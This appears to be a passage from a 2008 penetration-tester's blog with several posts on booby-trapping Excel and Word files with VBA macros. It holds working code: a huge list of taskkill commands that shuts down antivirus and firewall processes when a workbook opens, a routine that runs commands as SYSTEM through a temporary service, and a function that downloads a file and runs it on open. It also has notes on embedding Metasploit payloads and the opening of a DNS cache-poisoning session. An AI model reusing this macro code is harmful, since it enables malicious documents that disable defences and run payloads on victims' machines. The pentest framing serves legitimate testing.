""npscheck.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""npssvc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsched32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nssys32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nstask32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsupdate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntrtscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntvdm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntxconfig.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nui.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvarch16.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvsvc32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwinst4.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwservice.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwtool16.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ollydbg.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""onsrvr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""optimize.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ostronet.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""otfix.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostinstall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostproinstall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""panixk.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""patch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavproxy.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcip10117_0.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pdsetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""periscope.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""perswf.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pf2.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pfwadmin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pgmonitr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pingscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""platin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pop3trap.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""poproxy.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""popscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""portdetective.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""portmonitor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""powerscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppinupdt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pptbc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppvstop.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""prizesurfer.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmvr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""procdump.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""processmonitor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""procexplorerv1.0.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""programauditor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""proport.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""protectx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""pspf.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""purge.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""qconsole.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""qserver.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rapapp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav8win32eng.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ray.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rb32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rcsync.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""realmon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""reged.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedt32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rrguard.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rshell.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscn95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rulaunch.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""run32dll.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll16.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ruxdll32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sahagent.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""save.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""savenow.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sbserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scam32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""setup_flowprotector_us.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""setupvameeval.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sfc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sgssfw32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sh.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""shellspyinstall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""shn.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""showbehind.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sms.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""smss32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""soap.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sofi.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sperm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""spf.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoler.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolcv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolsv32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""spyxx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""srexe.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""srng.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ss3edit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssg_4104.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssgrate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""st2.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""start.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""stcloader.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""supftrl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""support.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""supporter5.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""svc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchostc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchosts.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""svshost.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweepnet.sweepsrv.sys.swnetsup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""symproxysvc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""symtray.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysedit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""system.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""system32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysupd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmg.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmgr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmo.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""taumon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tc.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tcm.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds-3.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""teekids.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak5.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tgbob.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""titanin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""titaninxp.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tracert.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""trickler.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjscan.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjsetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""trojantrap3.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tsadbot.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvmd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvtmd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""undoboot.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""updat.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""upgrad.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""utpost.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcmserv.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcons.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbust.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwin9x.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwinntw.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vcsetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vfsetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vir-help.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""virusmdpersonalfirewall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnlan300.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnpc3000.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc42.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpfw30s.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vptray.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscenu6.02d30.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsched.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsisetup.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmain.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswin9xe.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinntse.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinperse.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""w32dsm89.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""w9x.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""watchdog.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""webdav.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""webtrap.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""whoswatchingme.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wimmun32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32us.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winactive.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""win-bugsfix.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""window.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""windows.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininetd.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininit.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wininitx.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winlogin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winmain.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winnet.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winppr32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winrecon.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winservn.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winssk32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winstart001.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wintsk32.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""winupdate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wkufind.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnad.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wnt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wradmin.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wrctrl.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wsbgate.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdater.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wupdt.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""wyvernworksfirewall.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""xpf202en.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapro.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zapsetup3001.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zatutor.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonalm2601.exe"""<br /> Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""<br /> <br /> Run_Sys_Cmds arrayCmds, INVISIBLE, WAIT<br />End Function<br /></code></pre><br /><br />Call it with a simple:<br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Sub Workbook_Open()<br /> Kill_AV<br />End Sub<br /></code></pre>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com4tag:blogger.com,1999:blog-8542235839869152787.post-15811736606135745762008-11-16T18:16:00.001-08:002008-12-12T14:59:35.431-08:00Running commands as SYSTEM from VBA in Word or ExcelSometime's it is useful to run commands with SYSTEM level privilege because, for some reason, simply having Administrator won't allow you to do something you need. I often run into this with trying to kill antivirus processes or similar, as they usually require some sort of password to shut them off. If you kill it from under the SYSTEM account, however, it'll shut off without any problems:<br /><br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code>Function Run_Sys_Cmds(arrayCmds As Variant, visibility, wait_on_execute)<br /><br /> Set fso = CreateObject("Scripting.FileSystemObject")<br /> Set systemCmd = fso.CreateTextFile(Environ("TEMP") & "\systemCmd.vbs")<br /> Set batchRun = fso.CreateTextFile(Environ("TEMP") & "\systemBatch.bat")<br /> <br /> systemCmd.WriteLine ("CreateObject(""Wscript.Shell"").Run """ & Environ("TEMP") & "\systemBatch.bat" & """, " & visibility & ", " & wait_on_execute)<br /> <br /> For Each cmd In arrayCmds<br /> batchRun.WriteLine (cmd)<br /> Next cmd<br /> <br /> systemCmd.Close<br /> batchRun.Close<br /> <br /> Run_Cmd "sc create systemCmd binpath= ""%COMSPEC% /c wscript %TEMP%\systemCmd.vbs "" type= own type= interact", INVISIBLE, WAIT<br /> Run_Cmd "sc start systemCmd", INVISIBLE, WAIT<br /> Run_Cmd "sc delete systemCmd", INVISIBLE, WAIT<br /> Kill Environ("TEMP") & "\systemCmd.vbs"<br /> Kill Environ("TEMP") & "\systemBatch.bat"<br /><br />End Function<br /></code></pre><br />This version only accepts an array of commands to be processed. I found that it was way too slow to process a large number of commands unless you did it this way. It would be simple to modify to accept a regular String instead, if you wish to change it to use it for one-off commands.<br /><br />You'd call this with something like:<br /><pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%"><code> Dim syscmd(1) As String<br /> syscmd(0) = "set && pause"<br /> syscmd(1) = "ping 127.0.0.1"<br /> Run_Sys_Cmds syscmd, VISIBLE, WAIT<br /></code></pre><br />It executes commands at the SYSTEM level by creating a service that will run your command for you. Unless you specify otherwise, services always run as the SYSTEM account. Creating services is only possible if you have Administrator-level privileges on the system, so I really only find this useful to get around locked files or antivirus.<br /><br />It's on my TO DO list to play with <a href="http://www.eweek.com/c/a/Security/Hacker-Pours-Cold-Water-on-Windows-Server-2008-Security-Design/">the</a> <a href="http://securitywatch.eweek.com/flaws/microsoft_belatedly_admits_to_windows_server_2008_token_kidnapping.html">token-kidnapping</a> <a href="http://nomoreroot.blogspot.com/2008/10/token-kidnapping-windows-2008-poc.html">exploit</a> for Windows Server 2003/2008 (and supposedly XP2?) that allows any authenticated user to gain SYSTEM privileges. Unfortunately, I haven't had time to play with it yet.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com3tag:blogger.com,1999:blog-8542235839869152787.post-10433959315421240662008-11-16T18:10:00.001-08:002008-11-17T07:22:42.408-08:00VBA Function to Download FilesSo, what happens if the payload you want to run is too large to directly paste into an Excel or Word document with metasploit's <a href="http://blogs.securiteam.com/index.php/archives/1161">exe2vba</a>? Why don't you just download it from the internet?<br /><br />Unfortunately, MS didn't decide to give us a copy of wget, so we have to write it ourselves. This function uses the XMLHTTP object to download binary files and write them to disk. I don't remember where I found this code, but just for full disclosure, I didn't write it:<br /><br /><p><TT>Function Download_File(ByVal vWebFile As String, ByVal vLocalFile As String) As Boolean<br /> Dim oXMLHTTP As Object, i As Long, vFF As Long, oResp() As Byte<br /> <br /> 'You can also set a ref. to Microsoft XML, and Dim oXMLHTTP as MSXML2.XMLHTTP<br /> Set oXMLHTTP = CreateObject("MSXML2.XMLHTTP")<br /> oXMLHTTP.Open "GET", vWebFile, False 'Open socket to get the website<br /> oXMLHTTP.Send 'send request<br /> <br /> 'Wait for request to finish<br /> Do While oXMLHTTP.readyState <> 4<br /> DoEvents<br /> Loop<br /> <br /> oResp = oXMLHTTP.responseBody 'Returns the results as a byte array<br /> <br /> 'Create local file and save results to it<br /> vFF = FreeFile<br /> If Dir(vLocalFile) <> "" Then Kill vLocalFile<br /> Open vLocalFile For Binary As #vFF<br /> Put #vFF, , oResp<br /> Close #vFF<br /> <br /> 'Clear memory<br /> Set oXMLHTTP = Nothing<br />End Function</TT></P><br />Here's the call that will download a copy of the <a href="http://www.ritlabs.com/en/products/tinyweb/">Tiny Web Server</a> to the %TEMP% directory and use the local installation of Winzip to install it:<br /><P><TT>Sub Workbook_Open()<br /> 'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip<br /> 'Obviously in a real world application you'd want to bring your own unzipper<br /> Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"<br /> Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT<br />End Sub</TT></P>Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com6tag:blogger.com,1999:blog-8542235839869152787.post-87341923900001919972008-11-16T17:49:00.000-08:002008-11-17T07:21:47.363-08:00On VBA in Excel and Word Documents...There have been a <a href="http://seclists.org/pen-test/2008/Nov/0041.html">few</a> <a href="http://blogs.securiteam.com/index.php/archives/1161">posts</a> around the interwebs recently on how to use VBA to boobytrap Excel or Word documents with executables that will run on startup. I've been playing with it a bit and thought I'd write a series of posts on my findings to store this info in one place, in case anyone else finds this stuff useful in pentests.<br /><br />First, a quick note on converting executables to store in VBA. Based on my testing, the default Visual Basic Editor (VBE) that comes with MS Office 2003 (haven't tested 2007 yet) has a relatively low memory limit on how much you can store inside the script sections. This correlates to a max executable filesize of around 32k on my system. Anything larger than that you won't be able to paste in the output from metasploit's exe2vba because you will recieve an error message, "Not Enough Memory".<br /><br />I'm sure you could convert this script to allow you to store the hex strings inside a hidden, locked worksheet and reference it from the code sections. I don't know how many of you will run into this, as many of the metasploit payloads are only around ~10k.<br /><br />Back to VBA, we'll start with a couple of simple functions that will allow you to run invisible commands or programs on the system:<br /><p><tt>Sub Run_Cmd(command, visibility, wait_on_execute)<br /> Dim WshShell As Variant<br /> Set WshShell = CreateObject("WScript.Shell")<br /> WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute<br />End Sub<br /><br />Sub Run_Program(program, arguments, visibility, wait_on_execute)<br /> Dim WshShell As Variant<br /> Set WshShell = CreateObject("WScript.Shell")<br /> WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute<br />End Sub<br /></TT></P><br />These would be called from within the "ThisWorkbook" tab in VBE with a function like:<br /><p><TT>Const VISIBLE = 1, INVISIBLE = 0<br />Const WAIT = True, NOWAIT = False<br /><br />Sub Workbook_Open()<br /> Run_Cmd "ping 127.0.0.1", VISIBLE, WAIT<br /> Run_Program "notepad.exe", "", VISIBLE, NOWAIT<br />End Sub </TT></P><br />INVISIBLE / VISIBLE does just what you would think: toggles the visibility of the program or command as you wish. WAIT / NOWAIT also functions as you would expect; if set to WAIT, the VBA execution will halt until the process finishes. NOWAIT continues execution as soon as the program/command begins.Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com1tag:blogger.com,1999:blog-8542235839869152787.post-77306182265448874532008-07-25T07:26:00.001-07:002008-07-25T15:17:58.151-07:00AV Industry: Then and NowVia twitter:<br /><img src="http://blog.rogeriopvl.com/wp-content/uploads/avindustry.gif" />Nathan Keltnerhttp://www.blogger.com/profile/08165445198675206275noreply@blogger.com3tag:blogger.com,1999:blog-8542235839869152787.post-87757224644647234862008-07-24T08:44:00.000-07:002008-07-25T15:18:24.085-07:00U CAN HAZ METASPLOIT TOO. ENJOI.(svn update will pull the current code in... it's under intense revisioning right now; something like 6 revisions in 5 hours this morning)<br /><br />The current version will actually replace the cached entries for the name server itself, allowing you to hijack entire domains at once. Previous code (form earlier this morning) would allow you to take over individual entries (e.g. randomwhatever.example.com), but now you can take over (*.example.com).<br /><br />Patch up, children.<br /><br />-n<br /><br /><a href="http://www.caughq.org/exploits/CAU-EX-2008-0003.txt">http://www.caughq.org/exploits/CAU-EX-2008-0003.txt</a><br /><br /># /msf3/msfconsole<br /><br /> ## ### ## ##<br />## ## #### ###### #### ##### ##### ## #### ######<br />####### ## ## ## ## ## ## ## ## ## ## ### ##<br />####### ###### ## ##### #### ## ## ## ## ## ## ##<br />## # ## ## ## ## ## ## ##### ## ## ## ## ##<br />## ## #### ### ##### ##### ## #### #### #### ###<br /> ##<br /><br /><br /> =[ msf v3.2-release<br />+ -- --=[ 298 exploits - 124 payloads<br />+ -- --=[ 18 encoders - 6 nops<br /> =[ 73 aux<br /><br />msf > use auxiliary/spoof/dns/bailiwicked_domain<br />msf auxiliary(bailiwicked_domain) > set RHOST 